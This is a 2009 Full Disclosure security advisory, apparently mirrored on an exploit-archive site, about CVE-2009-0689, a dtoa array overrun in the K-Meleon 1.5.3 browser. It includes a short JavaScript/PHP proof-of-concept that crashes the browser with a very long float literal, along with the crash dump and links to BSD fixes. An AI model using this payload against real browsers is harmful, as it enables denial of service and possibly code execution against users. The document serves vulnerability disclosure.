Skip to content
cyberexploits
dosfreebsdtext

K-Meleon 1.5.3 - Remote Array Overrun

K-Meleon 1.5.3 - Remote Array Overrun

Publié le 2009-11-19

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/bsd/dos/10186.txt7eac4c3a
raw
From Full Disclosure: http://seclists.org/fulldisclosure/2009/Nov/222



-----BEGIN PGP SIGNED MESSAGE-----

Hash: SHA1



[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]



Author: Maksymilian Arciemowicz and sp3x

http://SecurityReason.com

Date:

- - Dis.: 07.05.2009

- - Pub.: 20.11.2009



CVE: CVE-2009-0689

Risk: High

Remote: Yes



Affected Software:

- - K-Meleon 1.5.3



NOTE: Prior versions may also be affected.



Original URL:

http://securityreason.com/achievement_securityalert/72





- --- 0.Description ---

K-Meleon is an extremely fast, customizable, lightweight web browser

based on the Gecko layout engine developed by Mozilla which is also used

by Firefox. K-Meleon is free, open source software released under the

GNU General Public License and is designed specifically for Microsoft

Windows (Win32) operating systems.





- --- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---

The main problem exist in dtoa implementation. K-Meleon has the same

dtoa as a KDE, Opera and all BSD systems. This issue has been fixed in

Firefox 3.5.4 and fix



http://securityreason.com/achievement_securityalert/63



but fix for SREASONRES:20090625, used by openbsd was not good.

More information about fix for openbsd and similars SREASONRES:20091030,



http://securityreason.com/achievement_securityalert/69



We can create any number of float, which will overwrite the memory. In

Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it

is possible to call 16<= elements of freelist array.





- --- 2. Proof of Concept  (PoC) ---



- -----------------------

<script>

var a=0.<?php echo str_repeat("1",296450); ?>;

</script>

- -----------------------



K-Meleon will crash with



Unhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access

violation reading location 0x0bc576ec.



01800754  mov         eax,dword ptr [ecx]



EAX     00000002        

ECX     0BC576EC        

EDI     028FEB51        





- --- 3. SecurityReason Note ---



Officialy SREASONRES:20090625 has been detected in:

- - OpenBSD

- - NetBSD

- - FreeBSD

- - MacOSX

- - Google Chrome

- - Mozilla Firefox

- - Mozilla Seamonkey

- - KDE (example: konqueror)

- - Opera

- - K-Meleon



This list is not yet closed. US-CERT declared that will inform all

vendors about this issue, however, they did not do it. Even greater

confusion caused new CVE number "CVE-2009-1563". Secunia has informed

that this vulnerability was only detected in Mozilla Firefox, but nobody

was aware that the problem affects other products like ( KDE, Chrome )

and it is based on "CVE-2009-0689". After some time Mozilla Foundation

Security Advisory

("http://www.mozilla.org/security/announce/2009/mfsa2009-59.html";)

was updated with note :

"The underlying flaw in the dtoa routines used by Mozilla appears to be

essentially the same as that reported against the libc gdtoa routine by

Maksymilian Arciemowicz ( CVE-2009-0689)".

This fact ( new CVE number for Firefox Vulnerability )and PoC in

javascript (from Secunia), forced us to official notification all other

vendors. We publish all the individual advisories, to formally show all

vulnerable software and to avoid wrong CVE number. We do not see any

other way to fix this issue in all products.



Please note:

Patch used in Firefox 3.5.4 does not fully solve the problem. Dtoa

algorithm is not optimal and allows remote Denial of Service in Firefox

3.5.5 giving long float number.





- --- 4. Fix ---

NetBSD fix (optimal):

http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h



OpenBSD fix:

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c

http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c





- --- 5. Credits ---

Discovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.





- --- 6. Greets ---

Infospec p_e_a pi3





- --- 7. Contact ---

Email:

- - cxib {a.t] securityreason [d0t} com

- - sp3x {a.t] securityreason [d0t} com



GPG:

- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg

- - http://securityreason.com/key/sp3x.gpg



http://securityreason.com/

http://securityreason.pl/





-----BEGIN PGP SIGNATURE-----



iEYEARECAAYFAksF4ZoACgkQpiCeOKaYa9bJsACgqjmxJmR9BORNOK3YhNUeyz+o

l8EAn2V+5mXH7GLWp+btWMf+4fGDeIzw

=Zqoe

-----END PGP SIGNATURE-----

Voir sur GitHub